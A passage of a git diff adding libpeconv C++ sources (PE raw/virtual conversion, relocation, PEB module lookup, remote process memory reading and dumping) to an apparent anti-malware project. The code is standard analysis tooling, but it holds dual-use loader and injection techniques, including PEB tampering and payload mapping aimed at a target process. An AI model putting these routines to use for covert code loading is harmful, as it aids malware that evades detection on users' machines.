if (first_raw == 0 || (next_sec->PointerToRawData < first_raw)) { + first_raw = next_sec->PointerToRawData; + } + } + + //copy payload's headers: + if (hdrsSize == 0) { + hdrsSize= first_raw; +#ifdef _DEBUG + std::cout << "hdrsSize not filled, using calculated size: " << std::hex << hdrsSize << "\n"; +#endif + } + if (!validate_ptr((const LPVOID)payload, destBufferSize, (const LPVOID)payload, hdrsSize)) { + return false; + } + memcpy(destBuffer, payload, hdrsSize); + return true; +} + +BYTE* peconv::pe_raw_to_virtual( + IN const BYTE* payload, + IN size_t in_size, + OUT size_t &out_size, + IN OPTIONAL bool executable, + IN OPTIONAL ULONGLONG desired_base +) +{ + //check payload: + BYTE* nt_hdr = get_nt_hdrs(payload); + if (nt_hdr == NULL) { + std::cerr << "Invalid payload: " << std::hex << (ULONGLONG) payload << std::endl; + return nullptr; + } + DWORD payloadImageSize = 0; + + bool is64 = is64bit(payload); + if (is64) { + IMAGE_NT_HEADERS64* payload_nt_hdr = (IMAGE_NT_HEADERS64*)nt_hdr; + payloadImageSize = payload_nt_hdr->OptionalHeader.SizeOfImage; + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr = (IMAGE_NT_HEADERS32*)nt_hdr; + payloadImageSize = payload_nt_hdr->OptionalHeader.SizeOfImage; + } + + DWORD protect = executable ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE; + + //first we will prepare the payload image in the local memory, so that it will be easier to edit it, apply relocations etc. + //when it will be ready, we will copy it into the space reserved in the target process + BYTE* localCopyAddress = alloc_pe_buffer(payloadImageSize, protect, desired_base); + if (localCopyAddress == NULL) { + std::cerr << "Could not allocate memory in the current process" << std::endl; + return NULL; + } + //printf("Allocated local memory: %p size: %x\n", localCopyAddress, payloadImageSize); + if (!sections_raw_to_virtual(payload, in_size, (BYTE*)localCopyAddress, payloadImageSize)) { + std::cerr << "Could not copy PE file" << std::endl; + return NULL; + } + out_size = payloadImageSize; + return localCopyAddress; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_virtual_to_raw.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_virtual_to_raw.cpp new file mode 100644 index 0000000..72670bb --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_virtual_to_raw.cpp @@ -0,0 +1,213 @@ +#include "peconv/pe_virtual_to_raw.h" + +#include "peconv/util.h" +#include "peconv/pe_hdrs_helper.h" +#include "peconv/relocate.h" + +#include + +using namespace peconv; + +bool sections_virtual_to_raw(BYTE* payload, SIZE_T payload_size, OUT BYTE* destAddress, OUT SIZE_T *raw_size_ptr) +{ + if (!payload || !destAddress) return false; + + bool is64b = is64bit(payload); + + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (payload_nt_hdr == NULL) { + std::cerr << "Invalid payload: " << std::hex << (ULONGLONG) payload << std::endl; + return false; + } + + IMAGE_FILE_HEADER *fileHdr = NULL; + DWORD hdrsSize = 0; + LPVOID secptr = NULL; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*) payload_nt_hdr; + fileHdr = &(payload_nt_hdr64->FileHeader); + hdrsSize = payload_nt_hdr64->OptionalHeader.SizeOfHeaders; + secptr = (LPVOID)((ULONGLONG)&(payload_nt_hdr64->OptionalHeader) + fileHdr->SizeOfOptionalHeader); + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*) payload_nt_hdr; + fileHdr = &(payload_nt_hdr32->FileHeader); + hdrsSize = payload_nt_hdr32->OptionalHeader.SizeOfHeaders; + secptr = (LPVOID)((ULONGLONG)&(payload_nt_hdr32->OptionalHeader) + fileHdr->SizeOfOptionalHeader); + } + + //copy all the sections, one by one: +#ifdef _DEBUG + std::cout << "Coping sections:" << std::endl; +#endif + DWORD first_raw = 0; + SIZE_T raw_end = hdrsSize; + for (WORD i = 0; i < fileHdr->NumberOfSections; i++) { + PIMAGE_SECTION_HEADER next_sec = (PIMAGE_SECTION_HEADER)((ULONGLONG)secptr + (IMAGE_SIZEOF_SECTION_HEADER * i)); + if (!validate_ptr(payload, payload_size, next_sec, IMAGE_SIZEOF_SECTION_HEADER)) { + return false; + } + + LPVOID section_mapped = (BYTE*) payload + next_sec->VirtualAddress; + LPVOID section_raw_ptr = destAddress + next_sec->PointerToRawData; + SIZE_T sec_size = next_sec->SizeOfRawData; + + size_t new_end = sec_size + next_sec->PointerToRawData; + if (new_end > raw_end) raw_end = new_end; + + if ((next_sec->VirtualAddress + sec_size) > payload_size) { + std::cerr << "[!] Virtual section size is out ouf bounds: " << std::hex << sec_size << std::endl; + sec_size = (payload_size > next_sec->VirtualAddress) ? SIZE_T(payload_size - next_sec->VirtualAddress) : 0; + std::cerr << "[!] Truncated to maximal size: " << std::hex << sec_size << ", buffer size: " << payload_size << std::endl; + } + if (next_sec->VirtualAddress > payload_size && sec_size != 0) { + std::cerr << "[-] VirtualAddress of section is out ouf bounds: " << std::hex << next_sec->VirtualAddress << std::endl; + return false; + } + if (next_sec->PointerToRawData + sec_size > payload_size) { + std::cerr << "[-] Raw section size is out ouf bounds: " << std::hex << sec_size << std::endl; + return false; + } +#ifdef _DEBUG + std::cout << "[+] " << next_sec->Name << " to: " << std::hex << section_raw_ptr << std::endl; +#endif + //validate source: + if (!peconv::validate_ptr(payload, payload_size, section_mapped, sec_size)) { + std::cerr << "[-] Section " << i << ": out ouf bounds, skipping... " << std::endl; + continue; + } + //validate destination: + if (!peconv::validate_ptr(destAddress, payload_size, section_raw_ptr, sec_size)) { + std::cerr << "[-] Section " << i << ": out ouf bounds, skipping... " << std::endl; + continue; + } + memcpy(section_raw_ptr, section_mapped, sec_size); + if (first_raw == 0 || (next_sec->PointerToRawData < first_raw)) { + first_raw = next_sec->PointerToRawData; + } + } + if (raw_end > payload_size) raw_end = payload_size; + if (raw_size_ptr != NULL) { + (*raw_size_ptr) = raw_end; + } + + //copy payload's headers: + if (hdrsSize == 0) { + hdrsSize = first_raw; +#ifdef _DEBUG + std::cout << "hdrsSize not filled, using calculated size: " << std::hex << hdrsSize << "\n"; +#endif + } + if (!validate_ptr(payload, payload_size, payload, hdrsSize)) { + return false; + } + memcpy(destAddress, payload, hdrsSize); + return true; +} + +BYTE* peconv::pe_virtual_to_raw( + IN BYTE* payload, + IN size_t in_size, + IN ULONGLONG loadBase, + OUT size_t &out_size, + IN OPTIONAL bool rebuffer +) +{ + BYTE* out_buf = (BYTE*)alloc_pe_buffer(in_size, PAGE_READWRITE); + if (out_buf == NULL) return NULL; //could not allocate output buffer + + BYTE* in_buf = payload; + if (rebuffer) { + in_buf = (BYTE*) alloc_pe_buffer(in_size, PAGE_READWRITE); + if (in_buf == NULL) { + free_pe_buffer(out_buf, in_size); + return NULL; + } + memcpy(in_buf, payload, in_size); + } + + ULONGLONG oldBase = get_image_base(in_buf); + bool isOk = true; + // from the loadBase go back to the original base + if (!relocate_module(in_buf, in_size, oldBase, loadBase)) { + //Failed relocating the module! Changing image base instead... + if (!update_image_base(in_buf, (ULONGLONG)loadBase)) { + std::cerr << "[-] Failed relocating the module!" << std::endl; + isOk = false; + } else { +#ifdef _DEBUG + std::cerr << "[!] WARNING: The module could not be relocated, so the ImageBase has been changed instead!" << std::endl; +#endif + } + } + SIZE_T raw_size = 0; + if (isOk) { + if (!sections_virtual_to_raw(in_buf, in_size, out_buf, &raw_size)) { + isOk = false; + } + } + if (rebuffer && in_buf != NULL) { + free_pe_buffer(in_buf, in_size); + in_buf = NULL; + } + if (!isOk) { + free_pe_buffer(out_buf, in_size); + out_buf = NULL; + raw_size = 0; + } + out_size = raw_size; + return out_buf; +} + +BYTE* peconv::pe_realign_raw_to_virtual( + IN const BYTE* payload, + IN size_t in_size, + IN ULONGLONG loadBase, + OUT size_t &out_size +) +{ + out_size = in_size; + BYTE* out_buf = (BYTE*)alloc_pe_buffer(out_size, PAGE_READWRITE); + if (!out_buf) { + out_size = 0; + return nullptr; + } + memcpy(out_buf, payload, in_size); + + ULONGLONG oldBase = get_image_base(out_buf); + bool isOk = true; + // from the loadBase go back to the original base + if (!relocate_module(out_buf, out_size, oldBase, loadBase)) { + //Failed relocating the module! Changing image base instead... + if (!update_image_base(out_buf, (ULONGLONG)loadBase)) { + std::cerr << "[-] Failed relocating the module!" << std::endl; + isOk = false; + } else { +#ifdef _DEBUG + std::cerr << "[!] WARNING: The module could not be relocated, so the ImageBase has been changed instead!" << std::endl; +#endif + } + } + //--- + //set raw alignment the same as virtual + DWORD v_alignment = peconv::get_sec_alignment((const PBYTE)payload, false); + if (!peconv::set_sec_alignment(out_buf, true, v_alignment)) { + isOk = false; + } + //set Raw pointers and sizes of the sections same as Virtual + size_t sections_count = peconv::get_sections_count(out_buf, out_size); + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(out_buf, out_size, i); + if (!sec) break; + + sec->Misc.VirtualSize = peconv::get_virtual_sec_size(out_buf, sec, true); + sec->SizeOfRawData = sec->Misc.VirtualSize; + sec->PointerToRawData = sec->VirtualAddress; + } + //!--- + if (!isOk) { + free_pe_buffer(out_buf); + out_buf = nullptr; + out_size = 0; + } + return out_buf; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/peb_lookup.cpp b/ai_anti_malware/libpeconv/libpeconv/src/peb_lookup.cpp new file mode 100644 index 0000000..c58aa1a --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/peb_lookup.cpp @@ -0,0 +1,178 @@ +#include "ntddk.h" + +#include + +class SectionLocker { +public: + SectionLocker(RTL_CRITICAL_SECTION &_section) + : section(_section) + { + RtlEnterCriticalSection(§ion); + } + + ~SectionLocker() + { + RtlLeaveCriticalSection(§ion); + } + +protected: + RTL_CRITICAL_SECTION §ion; +}; + +//here we don't want to use any functions imported form extenal modules + +typedef struct _LDR_MODULE { + LIST_ENTRY InLoadOrderModuleList;// +0x00 + LIST_ENTRY InMemoryOrderModuleList;// +0x08 + LIST_ENTRY InInitializationOrderModuleList;// +0x10 + void* BaseAddress; // +0x18 + void* EntryPoint; // +0x1c + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + SHORT LoadCount; + SHORT TlsIndex; + HANDLE SectionHandle; + ULONG CheckSum; + ULONG TimeDateStamp; +} LDR_MODULE, *PLDR_MODULE; + +inline PPEB get_peb() +{ +#if defined(_WIN64) + return (PPEB)__readgsqword(0x60); +#else + return (PPEB)__readfsdword(0x30); +/* +//alternative way to fetch it: + LPVOID PEB = NULL; + __asm { + mov eax, fs:[30h] + mov PEB, eax + }; + return (PPEB)PEB; + + or: + LPVOID PEB = RtlGetCurrentPeb(); +*/ +#endif +} + +inline WCHAR to_lowercase(WCHAR c1) +{ + if (c1 <= L'Z' && c1 >= L'A') { + c1 = (c1 - L'A') + L'a'; + } + return c1; +} + +bool is_wanted_module(LPWSTR curr_name, LPWSTR wanted_name) +{ + if (wanted_name == NULL || curr_name == NULL) return false; + + WCHAR *curr_end_ptr = curr_name; + while (*curr_end_ptr != L'\0') { + curr_end_ptr++; + } + if (curr_end_ptr == curr_name) return false; + + WCHAR *wanted_end_ptr = wanted_name; + while (*wanted_end_ptr != L'\0') { + wanted_end_ptr++; + } + if (wanted_end_ptr == wanted_name) return false; + + while ((curr_end_ptr != curr_name) && (wanted_end_ptr != wanted_name)) { + + if (to_lowercase(*wanted_end_ptr) != to_lowercase(*curr_end_ptr)) { + return false; + } + wanted_end_ptr--; + curr_end_ptr--; + } + return true; +} + +HMODULE peconv::get_module_via_peb(IN OPTIONAL LPWSTR module_name) +{ + PPEB peb = get_peb(); + if (!peb) { + return NULL; + } + SectionLocker locker(*peb->LoaderLock); + LIST_ENTRY head = peb->Ldr->InLoadOrderModuleList; + + const PLDR_MODULE first_module = *((PLDR_MODULE *)(&head)); + PLDR_MODULE curr_module = first_module; + if (!module_name) { + return (HMODULE)(curr_module->BaseAddress); + } + + // it is a cyclic list, so if the next record links to the initial one, it means we went throught the full loop + do { + // this should also work as a terminator, because the BaseAddress of the last module in the cycle is NULL + if (curr_module == NULL || curr_module->BaseAddress == NULL) { + break; + } + if (is_wanted_module(curr_module->BaseDllName.Buffer, module_name)) { + return (HMODULE)(curr_module->BaseAddress); + } + curr_module = (PLDR_MODULE)curr_module->InLoadOrderModuleList.Flink; + + } while (curr_module != first_module); + + return NULL; +} + +size_t peconv::get_module_size_via_peb(IN OPTIONAL HMODULE hModule) +{ + PPEB peb = get_peb(); + if (!peb) { + return 0; + } + SectionLocker locker(*peb->LoaderLock); + LIST_ENTRY head = peb->Ldr->InLoadOrderModuleList; + + const PLDR_MODULE first_module = *((PLDR_MODULE *)(&head)); + PLDR_MODULE curr_module = first_module; + if (!hModule) { + return (size_t)(curr_module->SizeOfImage); + } + + // it is a cyclic list, so if the next record links to the initial one, it means we went throught the full loop + do { + // this should also work as a terminator, because the BaseAddress of the last module in the cycle is NULL + if (curr_module == NULL || curr_module->BaseAddress == NULL) { + break; + } + if (hModule == (HMODULE)(curr_module->BaseAddress)) { + return (size_t)(curr_module->SizeOfImage); + } + curr_module = (PLDR_MODULE)curr_module->InLoadOrderModuleList.Flink; + + } while (curr_module != first_module); + + return 0; +} + +bool peconv::set_main_module_in_peb(HMODULE module_ptr) +{ + PPEB peb = get_peb(); + if (peb == NULL) { + return false; + } + SectionLocker locker(*peb->FastPebLock); + peb->ImageBaseAddress = module_ptr; + return true; +} + +HMODULE peconv::get_main_module_via_peb() +{ + PPEB peb = get_peb(); + if (peb == NULL) { + return NULL; + } + SectionLocker locker(*peb->FastPebLock); + return (HMODULE) peb->ImageBaseAddress; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/relocate.cpp b/ai_anti_malware/libpeconv/libpeconv/src/relocate.cpp new file mode 100644 index 0000000..a401ef1 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/relocate.cpp @@ -0,0 +1,189 @@ +#include "peconv/relocate.h" + +#include "peconv/pe_hdrs_helper.h" +#include +#include + +using namespace peconv; + +#define RELOC_32BIT_FIELD 3 +#define RELOC_64BIT_FIELD 0xA + +class ApplyRelocCallback : public RelocBlockCallback +{ +public: + ApplyRelocCallback(bool _is64bit, ULONGLONG _oldBase, ULONGLONG _newBase) + : RelocBlockCallback(_is64bit), oldBase(_oldBase), newBase(_newBase) + { + } + + virtual bool processRelocField(ULONG_PTR relocField) + { + if (is64bit) { + ULONGLONG* relocateAddr = (ULONGLONG*)((ULONG_PTR)relocField); + ULONGLONG rva = (*relocateAddr) - oldBase; + (*relocateAddr) = rva + newBase; + } + else { + DWORD* relocateAddr = (DWORD*)((ULONG_PTR)relocField); + ULONGLONG rva = ULONGLONG(*relocateAddr) - oldBase; + (*relocateAddr) = static_cast(rva + newBase); + } + return true; + } + +protected: + ULONGLONG oldBase; + ULONGLONG newBase; +}; + +bool is_empty_reloc_block(BASE_RELOCATION_ENTRY *block, SIZE_T entriesNum, DWORD page, PVOID modulePtr, SIZE_T moduleSize) +{ + if (entriesNum == 0) { + return true; // nothing to process + } + BASE_RELOCATION_ENTRY* entry = block; + for (SIZE_T i = 0; i < entriesNum; i++) { + if (!validate_ptr(modulePtr, moduleSize, entry, sizeof(BASE_RELOCATION_ENTRY))) { + return false; + } + DWORD type = entry->Type; + if (type != 0) { + //non empty block found + return false; + } + entry = (BASE_RELOCATION_ENTRY*)((ULONG_PTR)entry + sizeof(WORD)); + } + return true; +} + +bool process_reloc_block(BASE_RELOCATION_ENTRY *block, SIZE_T entriesNum, DWORD page, PVOID modulePtr, SIZE_T moduleSize, bool is64bit, RelocBlockCallback *callback) +{ + if (entriesNum == 0) { + return true; // nothing to process + } + BASE_RELOCATION_ENTRY* entry = block; + SIZE_T i = 0; + for (i = 0; i < entriesNum; i++) { + if (!validate_ptr(modulePtr, moduleSize, entry, sizeof(BASE_RELOCATION_ENTRY))) { + break; + } + DWORD offset = entry->Offset; + DWORD type = entry->Type; + if (type == 0) { + break; + } + if (type != RELOC_32BIT_FIELD && type != RELOC_64BIT_FIELD) { + if (callback) { //print debug messages only if the callback function was set + printf("[-] Not supported relocations format at %d: %d\n", (int)i, (int)type); + } + return false; + } + DWORD reloc_field = page + offset; + if (reloc_field >= moduleSize) { + if (callback) { //print debug messages only if the callback function was set + printf("[-] Malformed field: %lx\n", reloc_field); + } + return false; + } + if (callback) { + bool isOk = callback->processRelocField(((ULONG_PTR)modulePtr + reloc_field)); + if (!isOk) { + std::cout << "[-] Failed processing reloc field at: " << std::hex << reloc_field << "\n"; + return false; + } + } + entry = (BASE_RELOCATION_ENTRY*)((ULONG_PTR)entry + sizeof(WORD)); + } + return (i != 0); +} + +bool peconv::process_relocation_table(IN PVOID modulePtr, IN SIZE_T moduleSize, IN RelocBlockCallback *callback) +{ + IMAGE_DATA_DIRECTORY* relocDir = peconv::get_directory_entry((const BYTE*)modulePtr, IMAGE_DIRECTORY_ENTRY_BASERELOC); + if (relocDir == NULL) { + std::cout << "[!] WARNING: no relocation table found!\n"; + return false; + } + if (!validate_ptr(modulePtr, moduleSize, relocDir, sizeof(IMAGE_DATA_DIRECTORY))) { + std::cerr << "[!] Invalid relocDir pointer\n"; + return false; + } + DWORD maxSize = relocDir->Size; + DWORD relocAddr = relocDir->VirtualAddress; + bool is64b = is64bit((BYTE*)modulePtr); + + IMAGE_BASE_RELOCATION* reloc = NULL; + + DWORD parsedSize = 0; + DWORD validBlocks = 0; + while (parsedSize < maxSize) { + reloc = (IMAGE_BASE_RELOCATION*)(relocAddr + parsedSize + (ULONG_PTR)modulePtr); + if (!validate_ptr(modulePtr, moduleSize, reloc, sizeof(IMAGE_BASE_RELOCATION))) { + std::cerr << "[-] Invalid address of relocations\n"; + return false; + } + if (reloc->SizeOfBlock == 0) { + break; + } + size_t entriesNum = (reloc->SizeOfBlock - 2 * sizeof(DWORD)) / sizeof(WORD); + DWORD page = reloc->VirtualAddress; + + BASE_RELOCATION_ENTRY* block = (BASE_RELOCATION_ENTRY*)((ULONG_PTR)reloc + sizeof(DWORD) + sizeof(DWORD)); + if (!validate_ptr(modulePtr, moduleSize, block, sizeof(BASE_RELOCATION_ENTRY))) { + std::cerr << "[-] Invalid address of relocations block\n"; + return false; + } + if (!is_empty_reloc_block(block, entriesNum, page, modulePtr, moduleSize)) { + if (process_reloc_block(block, entriesNum, page, modulePtr, moduleSize, is64b, callback)) { + validBlocks++; + } + else { + // the block was malformed + return false; + } + } + parsedSize += reloc->SizeOfBlock; + } + return (validBlocks != 0); +} + +bool apply_relocations(PVOID modulePtr, SIZE_T moduleSize, ULONGLONG newBase, ULONGLONG oldBase) +{ + const bool is64b = is64bit((BYTE*)modulePtr); + ApplyRelocCallback callback(is64b, oldBase, newBase); + return process_relocation_table(modulePtr, moduleSize, &callback); +} + +bool peconv::relocate_module(IN BYTE* modulePtr, IN SIZE_T moduleSize, IN ULONGLONG newBase, IN ULONGLONG oldBase) +{ + if (modulePtr == NULL) { + return false; + } + if (oldBase == 0) { + oldBase = get_image_base(modulePtr); + } + printf("ʼضλ: %p -> %p \n", oldBase, newBase); + +#ifdef _DEBUG + printf("New Base: %llx\n", newBase); + printf("Old Base: %llx\n", oldBase); +#endif + if (newBase == oldBase) { + printf("Nothing to relocate! oldBase is the same as the newBase!\n"); + return true; //nothing to relocate + } + if (apply_relocations(modulePtr, moduleSize, newBase, oldBase)) { + return true; + } +#ifdef _DEBUG + printf("Could not relocate the module!\n"); +#endif + return false; +} + +bool peconv::has_valid_relocation_table(IN const PBYTE modulePtr, IN const size_t moduleSize) +{ + return process_relocation_table(modulePtr, moduleSize, nullptr); +} + diff --git a/ai_anti_malware/libpeconv/libpeconv/src/remote_pe_reader.cpp b/ai_anti_malware/libpeconv/libpeconv/src/remote_pe_reader.cpp new file mode 100644 index 0000000..6ba6a9d --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/remote_pe_reader.cpp @@ -0,0 +1,299 @@ +#include "peconv/remote_pe_reader.h" + +#include + +#include "peconv/util.h" +#include "peconv/fix_imports.h" + +using namespace peconv; + +bool peconv::fetch_region_info(HANDLE processHandle, BYTE* moduleBase, MEMORY_BASIC_INFORMATION &page_info) +{ + memset(&page_info, 0, sizeof(MEMORY_BASIC_INFORMATION)); + SIZE_T out = VirtualQueryEx(processHandle, (LPCVOID)moduleBase, &page_info, sizeof(page_info)); + if (out != sizeof(page_info)) { + return false; + } + return true; +} + +size_t peconv::fetch_region_size(HANDLE processHandle, BYTE* moduleBase) +{ + MEMORY_BASIC_INFORMATION page_info = { 0 }; + if (!peconv::fetch_region_info(processHandle, moduleBase, page_info)) { + return 0; + } + if (page_info.Type == 0) { + return false; //invalid type, skip it + } + if ((BYTE*)page_info.BaseAddress > moduleBase) { + return 0; //should never happen + } + size_t offset = moduleBase - (BYTE*)page_info.BaseAddress; + size_t area_size = page_info.RegionSize - offset; + return area_size; +} + +ULONGLONG peconv::fetch_alloc_base(HANDLE processHandle, BYTE* moduleBase) +{ + MEMORY_BASIC_INFORMATION page_info = { 0 }; + if (!peconv::fetch_region_info(processHandle, moduleBase, page_info)) { + return 0; + } + if (page_info.Type == 0) { + return 0; //invalid type, skip it + } + return (ULONGLONG) page_info.AllocationBase; +} + +size_t peconv::read_remote_memory(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size) +{ + if (!buffer) { + return 0; + } + memset(buffer, 0, buffer_size); + + SIZE_T read_size = 0; + DWORD last_error = ERROR_SUCCESS; + + for (SIZE_T to_read_size = buffer_size; to_read_size > 0; to_read_size -= step_size) + { + if (ReadProcessMemory(processHandle, start_addr, buffer, to_read_size, &read_size)) { + break; + } + // is it not the first attempt? + if (last_error != ERROR_SUCCESS) { + if (read_size == 0 && (last_error != ERROR_PARTIAL_COPY)) { + last_error = GetLastError(); + break; // no progress, break + } + } + + last_error = GetLastError(); + + if ((to_read_size < step_size) || step_size == 0) { + break; + } + //otherwise, decrease the to_read_size, and try again... + } + +#ifdef _DEBUG + if (read_size == 0) { + std::cerr << "[WARNING] Cannot read memory. Last Error : " << last_error << std::endl; + } + else if (read_size < buffer_size) { + std::cerr << "[WARNING] Read size: " << std::hex << read_size + << " is smaller than the requested size: " << std::hex << buffer_size + << ". Last Error: " << last_error << std::endl; + + } +#endif + return static_cast(read_size); +} + +size_t read_remote_region(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size) +{ + if (buffer == nullptr) { + return 0; + } + size_t region_size = peconv::fetch_region_size(processHandle, start_addr); + if (region_size == 0) return false; + + if (region_size >= buffer_size) { + return peconv::read_remote_memory(processHandle, start_addr, buffer, buffer_size, step_size); + } + return peconv::read_remote_memory(processHandle, start_addr, buffer, region_size, step_size); +} + +size_t peconv::read_remote_area(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size) +{ + if (!buffer || !start_addr) { + return 0; + } + memset(buffer, 0, buffer_size); + + size_t read = 0; + for (read = 0; read < buffer_size; ) { + size_t read_chunk = read_remote_region(processHandle, start_addr + read, buffer + read, buffer_size - read, step_size); + if (read_chunk == 0) { + size_t region_size = peconv::fetch_region_size(processHandle, start_addr); + if (region_size == 0) break; + //skip the region that could not be read: + read += region_size; + continue; + } + read += read_chunk; + } + return read; +} + +bool peconv::read_remote_pe_header(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size) +{ + if (buffer == nullptr) { + return false; + } + SIZE_T read_size = read_remote_memory(processHandle, start_addr, buffer, buffer_size); + if (read_size == 0) { + return false; + } + BYTE *nt_ptr = get_nt_hdrs(buffer); + if (nt_ptr == nullptr) { + return false; + } + const size_t nt_offset = nt_ptr - buffer; + const size_t nt_size = peconv::is64bit(buffer) ? sizeof(IMAGE_NT_HEADERS64) : sizeof(IMAGE_NT_HEADERS32); + const size_t min_size = nt_offset + nt_size; + + if (read_size < min_size) { + std::cerr << "[-] [" << std::dec << get_process_id(processHandle) + << " ][" << std::hex << (ULONGLONG) start_addr + << "] Read size: " << std::hex << read_size + << " is smaller that the minimal size:" << get_hdrs_size(buffer) + << std::endl; + return false; + } + //reading succeeded and the header passed the checks: + return true; +} + +namespace peconv { + inline size_t roundup_to_unit(size_t size, size_t unit) + { + if (unit == 0) { + return size; + } + size_t parts = size / unit; + if (size % unit) parts++; + return parts * unit; + } +}; + +peconv::UNALIGNED_BUF peconv::get_remote_pe_section(HANDLE processHandle, BYTE *start_addr, const size_t section_num, OUT size_t §ion_size, bool roundup) +{ + BYTE header_buffer[MAX_HEADER_SIZE] = { 0 }; + + if (!read_remote_pe_header(processHandle, start_addr, header_buffer, MAX_HEADER_SIZE)) { + return NULL; + } + PIMAGE_SECTION_HEADER section_hdr = get_section_hdr(header_buffer, MAX_HEADER_SIZE, section_num); + if (section_hdr == NULL || section_hdr->Misc.VirtualSize == 0) { + return NULL; + } + size_t buffer_size = section_hdr->Misc.VirtualSize; + if (roundup) { + DWORD va = peconv::get_sec_alignment(header_buffer, false); + if (va == 0) va = PAGE_SIZE; + buffer_size = roundup_to_unit(section_hdr->Misc.VirtualSize, va); + } + UNALIGNED_BUF module_code = peconv::alloc_unaligned(buffer_size); + if (module_code == NULL) { + return NULL; + } + size_t read_size = read_remote_memory(processHandle, start_addr + section_hdr->VirtualAddress, module_code, buffer_size); + if (read_size == 0) { + peconv::free_unaligned(module_code); + return NULL; + } + section_size = buffer_size; + return module_code; +} + +size_t peconv::read_remote_pe(const HANDLE processHandle, BYTE *start_addr, const size_t mod_size, OUT BYTE* buffer, const size_t bufferSize) +{ + if (buffer == nullptr) { + std::cerr << "[-] Invalid output buffer: NULL pointer" << std::endl; + return 0; + } + if (bufferSize < mod_size || bufferSize < MAX_HEADER_SIZE ) { + std::cerr << "[-] Invalid output buffer: too small size!" << std::endl; + return 0; + } + // read PE section by section + PBYTE hdr_buffer = buffer; + //try to read headers: + if (!read_remote_pe_header(processHandle, start_addr, hdr_buffer, MAX_HEADER_SIZE)) { + std::cerr << "[-] Failed to read the module header" << std::endl; + return 0; + } + if (!is_valid_sections_hdr_offset(hdr_buffer, MAX_HEADER_SIZE)) { + std::cerr << "[-] Sections headers are invalid or atypically aligned" << std::endl; + return 0; + } + size_t sections_count = get_sections_count(hdr_buffer, MAX_HEADER_SIZE); +#ifdef _DEBUG + std::cout << "Sections: " << sections_count << std::endl; +#endif + size_t read_size = MAX_HEADER_SIZE; + + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER hdr = get_section_hdr(hdr_buffer, MAX_HEADER_SIZE, i); + if (!hdr) { + std::cerr << "[-] Failed to read the header of section: " << i << std::endl; + break; + } + const DWORD sec_va = hdr->VirtualAddress; + const DWORD sec_vsize = get_virtual_sec_size(hdr_buffer, hdr, true); + if (sec_va + sec_vsize > bufferSize) { + std::cerr << "[-] No more space in the buffer!" << std::endl; + break; + } + if (sec_vsize > 0 && !read_remote_memory(processHandle, start_addr + sec_va, buffer + sec_va, sec_vsize)) { + std::cerr << "[-] Failed to read the module section " << i <<" : at: " << std::hex << ULONG_PTR(start_addr + sec_va) << std::endl; + } + // update the end of the read area: + size_t new_end = sec_va + sec_vsize; + if (new_end > read_size) read_size = new_end; + } +#ifdef _DEBUG + std::cout << "Total read size: " << read_size << std::endl; +#endif + return read_size; +} + +DWORD peconv::get_remote_image_size(IN const HANDLE processHandle, IN BYTE *start_addr) +{ + BYTE hdr_buffer[MAX_HEADER_SIZE] = { 0 }; + if (!read_remote_pe_header(processHandle, start_addr, hdr_buffer, MAX_HEADER_SIZE)) { + return 0; + } + return peconv::get_image_size(hdr_buffer); +} + +bool peconv::dump_remote_pe(IN const char *out_path, + IN const HANDLE processHandle, + IN BYTE* start_addr, + IN OUT t_pe_dump_mode &dump_mode, + IN OPTIONAL peconv::ExportsMapper* exportsMap) +{ + DWORD mod_size = get_remote_image_size(processHandle, start_addr); +#ifdef _DEBUG + std::cout << "Module Size: " << mod_size << std::endl; +#endif + if (mod_size == 0) { + return false; + } + + BYTE* buffer = peconv::alloc_pe_buffer(mod_size, PAGE_READWRITE); + if (buffer == nullptr) { + std::cerr << "[-] Failed allocating buffer. Error: " << GetLastError() << std::endl; + return false; + } + //read the module that it mapped in the remote process: + const size_t read_size = read_remote_pe(processHandle, start_addr, mod_size, buffer, mod_size); + if (read_size == 0) { + std::cerr << "[-] Failed reading module. Error: " << GetLastError() << std::endl; + peconv::free_pe_buffer(buffer, mod_size); + buffer = nullptr; + return false; + } + + const bool is_dumped = peconv::dump_pe(out_path, + buffer, mod_size, + reinterpret_cast(start_addr), + dump_mode, exportsMap); + + peconv::free_pe_buffer(buffer, mod_size); + buffer = nullptr; + return is_dumped; +} + diff --git a/ai_anti_malware/libpeconv/libpeconv/src/resource_parser.cpp b/ai_anti_malware/libpeconv/libpeconv/src/resource_parser.cpp new file mode 100644 index 0000000..4d22469 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/resource_parser.cpp @@ -0,0 +1,90 @@ +#include "peconv/resource_parser.h" +#include "peconv/pe_hdrs_helper.h" + +#ifdef _DEBUG +#include +#endif + +bool parse_resource_dir(BYTE* modulePtr, const size_t moduleSize, + IMAGE_RESOURCE_DIRECTORY_ENTRY *root_dir, + const IMAGE_RESOURCE_DIRECTORY *upper_dir, + IMAGE_RESOURCE_DIRECTORY* curr_dir, + peconv::t_on_res_entry_found on_entry); + +bool parse_resource_entry(BYTE* modulePtr, const size_t moduleSize, + IMAGE_RESOURCE_DIRECTORY_ENTRY *root_dir, + const IMAGE_RESOURCE_DIRECTORY *upper_dir, + 